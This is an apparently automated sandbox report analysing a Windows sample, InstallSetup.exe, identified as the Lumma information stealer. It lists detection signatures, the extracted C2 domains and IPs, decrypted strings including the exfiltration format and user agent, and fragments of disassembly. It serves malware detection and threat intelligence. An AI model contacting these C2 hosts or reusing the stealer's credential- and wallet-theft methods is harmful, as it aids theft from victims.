Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
InstallSetup.exe

Overview

General Information

Sample name:InstallSetup.exe
Analysis ID:1577460
MD5:8d746459e4ecdc159bd431bbc01e9672
SHA1:7efd87f9513cd69ef9c43fe826895da73a5d679a
SHA256:7d25ec756bbb5bec2e48dd71255de460789057b354de9dfcf6fce4ee2563d3da
Tags:bulletproofexeLummaStealeruser-abus3reports
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • InstallSetup.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\InstallSetup.exe" MD5: 8D746459E4ECDC159BD431BBC01E9672)
    • C7B4.tmp.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe" MD5: 9026F04B1266851659FB62C91BD7F2F3)
      • WerFault.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1700:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1688:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Process Memory Space: C7B4.tmp.exe PID: 3032JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Click to see the 3 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:33.272870+010020283713Unknown Traffic192.168.2.849706172.67.220.223443TCP
        2024-12-18T13:49:35.220835+010020283713Unknown Traffic192.168.2.849707172.67.220.223443TCP
        2024-12-18T13:49:38.123685+010020283713Unknown Traffic192.168.2.849708172.67.220.223443TCP
        2024-12-18T13:49:40.368864+010020283713Unknown Traffic192.168.2.849711172.67.220.223443TCP
        2024-12-18T13:49:42.726217+010020283713Unknown Traffic192.168.2.849714172.67.220.223443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:33.991819+010020546531A Network Trojan was detected192.168.2.849706172.67.220.223443TCP
        2024-12-18T13:49:36.045088+010020546531A Network Trojan was detected192.168.2.849707172.67.220.223443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:33.991819+010020498361A Network Trojan was detected192.168.2.849706172.67.220.223443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:36.045088+010020498121A Network Trojan was detected192.168.2.849707172.67.220.223443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:33.272870+010020583751Domain Observed Used for C2 Detected192.168.2.849706172.67.220.223443TCP
        2024-12-18T13:49:35.220835+010020583751Domain Observed Used for C2 Detected192.168.2.849707172.67.220.223443TCP
        2024-12-18T13:49:38.123685+010020583751Domain Observed Used for C2 Detected192.168.2.849708172.67.220.223443TCP
        2024-12-18T13:49:40.368864+010020583751Domain Observed Used for C2 Detected192.168.2.849711172.67.220.223443TCP
        2024-12-18T13:49:42.726217+010020583751Domain Observed Used for C2 Detected192.168.2.849714172.67.220.223443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:31.512750+010020583741Domain Observed Used for C2 Detected192.168.2.8652771.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:41.130163+010020480941Malware Command and Control Activity Detected192.168.2.849711172.67.220.223443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T13:49:26.142876+010028032742Potentially Bad Traffic192.168.2.849704172.67.179.207443TCP
        2024-12-18T13:49:27.727047+010028032742Potentially Bad Traffic192.168.2.849705176.113.115.1980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: InstallSetup.exeAvira: detected
        Source: https://rapeflowwj.lat/apijAvira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEVAvira URL Cloud: Label: malware
        Source: https://rapeflowwj.lat/apiAvira URL Cloud: Label: malware
        Source: https://rapeflowwj.lat/Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
        Source: 3.3.C7B4.tmp.exe.9c0000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "aspecteirs.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "discokeyus.lat", "sustainskelet.lat", "necklacebudi.lat"], "Build id": "4h5VfH--"}
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeReversingLabs: Detection: 68%
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeReversingLabs: Detection: 68%
        Source: InstallSetup.exeReversingLabs: Detection: 68%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeJoe Sandbox ML: detected
        Source: InstallSetup.exeJoe Sandbox ML: detected
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: rapeflowwj.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: crosshuaht.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sustainskelet.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: aspecteirs.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: energyaffai.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: necklacebudi.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: discokeyus.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: grannyejh.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: rapeflowwj.lat
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
        Source: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 3_2_00415799 CryptUnprotectData,3_2_00415799

        Compliance

        barindex
        Source: C:\Users\user\Desktop\InstallSetup.exeUnpacked PE file: 0.2.InstallSetup.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeUnpacked PE file: 3.2.C7B4.tmp.exe.400000.0.unpack
        Source: InstallSetup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.8:49714 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
        Source: C:\Users\user\Desktop\InstallSetup.exeCode function: 0_2_00978C59 FindFirstFileExW,0_2_00978C59
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Jump to behavior
        Source: C:\Users\user\Desktop\InstallSetup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, esi3_2_00422190
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_00422190
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h3_2_00422190
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00409580
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], ax3_2_00409580
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]3_2_0043C767
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov esi, eax3_2_00415799
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00415799
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp eax3_2_0042984F
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]3_2_00423860
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00438810
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh3_2_00438810
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh3_2_00438810
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then test eax, eax3_2_00438810
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041682D
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]3_2_0041682D
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]3_2_0041682D
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ecx], bp3_2_0041D83A
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push C0BFD6CCh3_2_00423086
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push C0BFD6CCh3_2_00423086
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042B170
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]3_2_004179C1
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h3_2_0043B1D0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_0043B1D0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_004291DD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]3_2_004291DD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00405990
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00405990
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042CA49
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0042DA53
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]3_2_00416263
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]3_2_00415220
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push esi3_2_00427AD3
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042CAD0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0041B2E0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push ebx3_2_0043CA93
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041CB40
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_0041CB40
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00428B61
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042CB11
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042CB22
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]3_2_0043F330
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_0040DBD9
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_0040DBD9
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]3_2_00417380
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h3_2_0041D380
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00426B95
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00435450
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]3_2_00417380
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push 00000000h3_2_00429C2B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_004291DD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]3_2_004291DD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]3_2_0043ECA0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h3_2_004385E0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp eax3_2_004385E0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]3_2_00417DEE
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp dword ptr [0044450Ch]3_2_00418591
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]3_2_00428D93
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then xor edi, edi3_2_0041759F
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]3_2_0041C653
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov edx, ebp3_2_00425E70
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp dword ptr [004455F4h]3_2_00425E30
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0043AEC0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al3_2_00408F50
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_00408F50
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042A700
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]3_2_0040B70C
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041BF14
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]3_2_00419F30
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]3_2_0041E7C0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]3_2_004197C2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [edi], dx3_2_004197C2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_004197C2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, ebx3_2_0042DFE9
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp ecx3_2_0040BFFD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]3_2_0043EFB0
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]3_2_0098C8BA
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov edx, ebp3_2_009960D7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]3_2_00994031
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]3_2_00988055
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h3_2_009A887B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]3_2_0098A197
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp eax3_2_009A898E
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al3_2_009791B7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_009791B7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_009AB127
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0098C17B
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]3_2_0097B973
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0099A967
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ecx], bp3_2_0098DAB8
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp eax3_2_00999AB5
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]3_2_00984ACD
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then push C0BFD6CCh3_2_009932ED
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]3_2_009AF217
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0098D230
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_0098D230
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx eax, word ptr [edx]3_2_00989A29
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [edi], dx3_2_00989A29
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00989A29
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]3_2_0098EA27
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ecx, ebx3_2_0099E250
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov edx, ecx3_2_009A8A77
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh3_2_009A8A77
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh3_2_009A8A77
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then test eax, eax3_2_009A8A77
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then jmp ecx3_2_0097C264
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]3_2_00984BD2
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0099B3D7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00975BF7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00975BF7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov ebx, esi3_2_009923F7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_009923F7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h3_2_009923F7
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00986B2A
        Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]3_2_00985487
